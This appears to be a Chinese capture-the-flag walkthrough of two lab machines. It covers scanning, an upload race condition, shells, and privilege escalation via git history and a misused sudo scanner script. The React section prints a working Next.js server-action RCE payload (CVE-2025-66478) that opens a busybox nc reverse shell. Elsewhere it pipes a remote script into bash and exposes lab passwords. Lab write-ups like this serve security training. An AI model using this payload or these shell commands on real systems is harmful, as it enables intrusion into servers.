    \u53d1\u73b0<\/p>\n\n\n\n
    [19:02:30] 200 -  841B  - \/index.php                                        
    [19:02:30] 200 -  841B  - \/index.php\/login\/                                 
    [19:02:30] 200 -   23KB - \/info.php                                         
    [19:02:36] 403 -  278B  - \/server-status                                    
    [19:02:36] 403 -  278B  - \/server-status\/                                   
    [19:02:38] 301 -  312B  - \/tmp  ->  http:\/\/10.247.102.33\/tmp\/               
    [19:02:38] 200 -  403B  - \/tmp\/                                             
    [19:02:38] 301 -  315B  - \/upload  ->  http:\/\/10.247.102.33\/upload\/         
    [19:02:38] 200 -  405B  - \/upload\/                                          <\/pre>\n\n\n\n
    \u53d1\u73b0\u6587\u4ef6\u4e0a\u4f20\u70b9\uff0c\u4e5f\u4f1a\u51fa\u73b0\u5728\/tmp\u4e0a,\u4f46\u662f\u518d\u70b9\u51fb\u7684\u65f6\u5019\uff0c\u5c31\u663e\u793a404\uff0c\u8be5\u6587\u4ef6\u4e5f\u6d88\u5931\u6389\u4e86<\/p>\n\n\n\n
    \u4f46\u662f\u4f20\u4e0a\u53bb\u6587\u4ef6\u540e\u7f00\u81ea\u52a8\u6dfb\u52a0dsz\uff0c\u90a3\u5e94\u8be5\u5c31\u662f\u5229\u7528\u6761\u4ef6\u7ade\u4e89\u53bb\u5199\u5165\u6076\u610f\u4ee3\u7801<\/p>\n\n\n\n
    7r1umph \u9776\u673a\u6e17\u900f\u6d4b\u8bd5\u62a5\u544a (Write-up)<\/a><\/p>\n\n\n\n
    \u53c2\u8003\u4e0a\u9762\u6587\u7ae0\uff0c\u901a\u8fc7\u5176\u53bb\u53cd\u5f39shell<\/p>\n\n\n\n
    \u2514\u2500# nc -lvnp 4444
    listening on [any] 4444 ...
    connect to [10.247.102.219] from (UNKNOWN) [10.247.102.33] 47452<\/pre>\n\n\n\n
    user<\/h3>\n\n\n\n
    www-data@7r1umph:\/home$ find \/ -type f -perm -4000 2>\/dev\/null
    find \/ -type f -perm -4000 2>\/dev\/null
    \/usr\/bin\/chsh
    \/usr\/bin\/chfn
    \/usr\/bin\/newgrp
    \/usr\/bin\/gpasswd
    \/usr\/bin\/mount
    \/usr\/bin\/su
    \/usr\/bin\/umount
    \/usr\/bin\/pkexec
    \/usr\/bin\/sudo
    \/usr\/bin\/passwd
    \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper
    \/usr\/lib\/eject\/dmcrypt-get-device
    \/usr\/lib\/openssh\/ssh-keysign
    \/usr\/libexec\/polkit-agent-helper-1<\/pre>\n\n\n\n
    \u6ca1\u6709\u4ec0\u4e48\u4e1c\u897f<\/p>\n\n\n\n
    www-data@7r1umph:\/home$ cd \/opt
    cd \/opt
    www-data@7r1umph:\/opt$ ls -al
    ls -al
    total 56
    drwxr-xr-x  2 root root  4096 Apr 12  2025 .
    drwxr-xr-x 18 root root  4096 Mar 18  2025 ..
    -rw-r--r--  1 root root 16968 Apr 12  2025 guess
    -rw-r--r--  1 root root 27871 Apr 12  2025 yeyeye.png<\/pre>\n\n\n\n
    \u53bb\u67e5\u770b\uff0c\u53d1\u73b0\u4e00\u4e2a\u56fe\u7247\uff0c<\/p>\n\n\n\n
    www-data@7r1umph:\/opt$ base64 \/opt\/yeyeye.png base\u52a0\u5bc6\u7136\u540e\u53bb\u968f\u6ce2\u9010\u6d41\u53bb\u751f\u6210\u56fe\u7247<\/pre>\n\n\n\n
    Dorabella Cipher<\/a><\/p>\n\n\n\n
    \u89e3\u5bc6\u51fa\u6765\u662f<\/p>\n\n\n\n
    yecongdong<\/pre>\n\n\n\n
    \u5c1d\u8bd5ssh\u8fde\u63a5\u6210\u529f\u8fdb\u5165<\/p>\n\n\n\n
    $ python3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'
    welcome@7r1umph:~$ <\/pre>\n\n\n\n
    root<\/h3>\n\n\n\n
    welcome@7r1umph:~$ ls
    RegView  user.txt
    welcome@7r1umph:~$ cd Re*
    welcome@7r1umph:~\/RegView$ ls
    poc.txt  README.md  RegView.sh  run.jpg  source.txt
    welcome@7r1umph:~\/RegView$ ll
    bash: ll: command not found
    welcome@7r1umph:~\/RegView$ ls -al
    total 476
    drwxr-xr-x 3 root    root      4096 Apr 12  2025 .
    drwx------ 3 welcome welcome   4096 Apr 12  2025 ..
    drwxr-xr-x 8 root    root      4096 Apr 12  2025 .git
    -rw-r--r-- 1 root    root       289 Dec  3  2024 poc.txt
    -rw-r--r-- 1 root    root       936 Apr 12  2025 README.md
    -rwxr-xr-x 1 root    root      3911 Apr 12  2025 RegView.sh
    -rw-r--r-- 1 root    root    457296 Dec  3  2024 run.jpg
    -rw-r--r-- 1 root    root      2095 Dec  3  2024 source.txt
    welcome@7r1umph:~\/RegView$ <\/pre>\n\n\n\n
    \u53d1\u73b0.git\u6587\u4ef6<\/p>\n\n\n\n
    git log \u67e5\u770b\u4e00\u4e0bgit\u7684\u65e5\u5fd7<\/pre>\n\n\n\n
    commit acd806aad21acb61112252234c7707bc8a74dd3c (HEAD -> main)
    Author: bamuwe <bamuwe@qq.com>
    Date:   Sat Apr 12 01:33:50 2025 -0400

        fix bug

    commit 900b75c25c03c4af30d8d05de61c01c723741ecc
    Author: bamuwe <bamuwe@qq.com>
    Date:   Sat Apr 12 01:32:22 2025 -0400

        add source2.txt

    \u53d1\u73b0source2.txt\u6587\u4ef6
    git show  900b75c:source2.txt
    root:ff855ad811c79e5fba458a575fac5b83
    welcome@7r1umph:~\/RegView$ su root
    Password: 
    root@7r1umph:\/home\/welcome\/RegView# 
    \u62ff\u4e0broot<\/pre>\n\n\n\n
    React<\/h2>\n\n\n\n
    user<\/h3>\n\n\n\n
    \u53cd\u5e94\uff0c\u6253\u5f00nmap\uff0cdirsearch,gobuster\u626b\u4e00\u4e0b\uff0c\u51fa\u676580 22 3000\u7aef\u53e3<\/p>\n\n\n\n
    \u521a\u5f00\u59cb\u6ca1\u592a\u7ba1\u8fd93000\u7aef\u53e3\uff0c\u53bb\u625380\u7aef\u53e3\u7684\u4e86\uff0c\u611f\u89c9\u662frce\u6ca1\u6709\u51fa\u6765\uff0c\u95ee\u7684\u5176\u4ed6cyl\u624d\u53d1\u73b03000\u7aef\u53e3\u6709\u6f0f\u6d1e\u5e76\u4e14\u662f\u4e4b\u524dCVE-2025-66478<\/p>\n\n\n\n
    POST \/ HTTP\/1.1
    Host: 10.247.102.188:3000
    Next-Action: x
    Content-Type: multipart\/form-data; boundary=----Boundary
    Content-Length: 641

    ------Boundary
    Content-Disposition: form-data; name=\"0\"

    {\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\",\"_response\":{\"_prefix\":\"var res=encodeURIComponent(process.mainModule.require('child_process').execSync('busybox nc 10.247.102.219 4444 -e bash').toString().trim());;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;\/login?a=${res};307;`});\",\"_chunks\":\"$Q2\",\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}
    ------Boundary
    Content-Disposition: form-data; name=\"1\"

    \"$@0\"
    ------Boundary
    Content-Disposition: form-data; name=\"2\"

    []
    ------Boundary--<\/pre>\n\n\n\n
    \u6210\u529f\u53cd\u5f39<\/p>\n\n\n\n
    curl -L https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh | bash \u770b\u4e00\u4e0b\uff0c\u6ca1\u6709\u4ec0\u4e48\u4e1c\u897f
    \u4e0d\u8fc7\u51fa\u6765bot\u7528\u6237\u5bc6\u7801\u4e86lMmqr98vg3Ke1Mu4hJwN<\/pre>\n\n\n\n
    \u767b\u5f55\u4e00\u4e0b<\/pre>\n\n\n\n
    root<\/h3>\n\n\n\n
    \u67e5\u770b\u7684\u7fa4\u53cb\u7684wp\uff0c\u524d\u6765\u590d\u73b0<\/p>\n\n\n\n
    sudo -l\u4e00\u4e0b
    bot@React:~$ sudo -l
    Matching Defaults entries for bot on React:
        env_reset, mail_badpass,
        secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin

    User bot may run the following commands on React:
        (ALL) NOPASSWD: \/opt\/react2shell\/scanner.py
        (ALL) NOPASSWD: \/usr\/bin\/rm -rf \/
    bot@React:~$ <\/pre>\n\n\n\n
    bot@React:~$ head \/opt\/react2shell\/scanner.py
    #!\/usr\/bin\/python3
    import argparse
    import sys
    import json
    import os
    import random
    import re
    import string
    from datetime import datetime, timezone
    from concurrent.futures import ThreadPoolExecutor, as_completed
    \u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\u7684\u5934\u90e8\u4fe1\u606f<\/pre>\n\n\n\n
    bot@React:~$ sudo \/opt\/react2shell\/scanner.py
    usage: scanner.py [-h] (-u URL | -l LIST) [-t THREADS] [--timeout TIMEOUT]
                      [-o OUTPUT] [--all-results] [-k] [-H HEADER] [-v] [-q]
                      [--no-color] [--safe-check] [--windows] [--waf-bypass]
                      [--waf-bypass-size KB]
    scanner.py: error: one of the arguments -u\/--url -l\/--list is required
    \u67e5\u770b\u4e00\u4e0b\u6709\u4ec0\u4e48\u4fe1\u606f<\/pre>\n\n\n\n
    curl -L https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh | bash<\/pre>\n\n\n\n
    \u626b\u63cf\u4e00\u4e9b\uff0c\u53d1\u73b0\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\/usr\/bin\/check_key<\/p>\n\n\n\n
    \u67e5\u770b\u4e00\u4e9b\u91cc\u9762\u7684\u4e1c\u897f
    bot@React:\/tmp$ \/usr\/bin\/check_key --help
    bot@React:\/tmp$ \/usr\/bin\/check_key -help
    bot@React:\/tmp$ strings \/usr\/bin\/check_key
    \/lib64\/ld-linux-x86-64.so.2
    fopen
    fgets
    strlen
    fclose
    system
    __cxa_finalize
    strcmp
    __libc_start_main
    libc.so.6
    GLIBC_2.2.5
    _ITM_deregisterTMCloneTable
    __gmon_start__
    _ITM_registerTMCloneTable
    u\/UH
    []A\\A]A^A_
    \/opt\/key
    cp \/root\/Reactrootpass.txt \/opt
    ;*3$\"
    GCC: (Debian 10.2.1-6) 10.2.1 20210110
    crtstuff.c
    deregister_tm_clones
    __do_global_dtors_aux
    completed.0
    __do_global_dtors_aux_fini_array_entry
    frame_dummy
    __frame_dummy_init_array_entry
    check_key.c
    __FRAME_END__
    __init_array_end
    _DYNAMIC
    __init_array_start
    __GNU_EH_FRAME_HDR
    _GLOBAL_OFFSET_TABLE_
    __libc_csu_fini
    _ITM_deregisterTMCloneTable
    _edata
    fclose@GLIBC_2.2.5
    strlen@GLIBC_2.2.5
    system@GLIBC_2.2.5
    __libc_start_main@GLIBC_2.2.5
    fgets@GLIBC_2.2.5
    __data_start
    strcmp@GLIBC_2.2.5
    __gmon_start__
    __dso_handle
    _IO_stdin_used
    __libc_csu_init
    __bss_start
    main
    fopen@GLIBC_2.2.5
    __TMC_END__
    _ITM_registerTMCloneTable
    __cxa_finalize@GLIBC_2.2.5
    .symtab
    .strtab
    .shstrtab
    .interp
    .note.gnu.build-id
    .note.ABI-tag
    .gnu.hash
    .dynsym
    .dynstr
    .gnu.version
    .gnu.version_r
    .rela.dyn
    .rela.plt
    .init
    .plt.got
    .text
    .fini
    .rodata
    .eh_frame_hdr
    .eh_frame
    .init_array
    .fini_array
    .dynamic
    .got.plt
    .data
    .bss
    .comment<\/pre>\n\n\n\n
    \u53d1\u73b0cp \/root\/Reactrootpass.txt \/opt<\/p>\n\n\n\n
    \u76f4\u63a5\u53bb\u8bfb
    bot@React:\/tmp$ sudo \/opt\/react2shell\/scanner.py -l \/root\/Reactrootpass.txt
    \u200b
    brought to you by assetnote
    \u200b
    [*] Loaded 1 host(s) to scan
    [*] Using 10 thread(s)
    [*] Timeout: 10s
    [*] Using RCE PoC check
    [!] SSL verification disabled
    \u200b
    [ERROR] To75CuOTHLA7BMmH5Puv
    \u62ff\u4e0b\u5bc6\u7801<\/pre>\n","protected":false},"excerpt":{"rendered":"
    \u6e17\u900f\u9776\u673a\ud83d\ude0d \u83b7\u53d6\u9776\u673a\u5730\u5740\uff1ahttps:\/\/maze-sec.com\/qq\u7fa4\uff1a660930334 HackMyV […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-176","post","type-post","status-publish","format-standard","hentry","category-8"],"_links":{"self":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/176","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=176"}],"version-history":[{"count":21,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/176\/revisions"}],"predecessor-version":[{"id":217,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/176\/revisions\/217"}],"wp:attachment":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=176"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}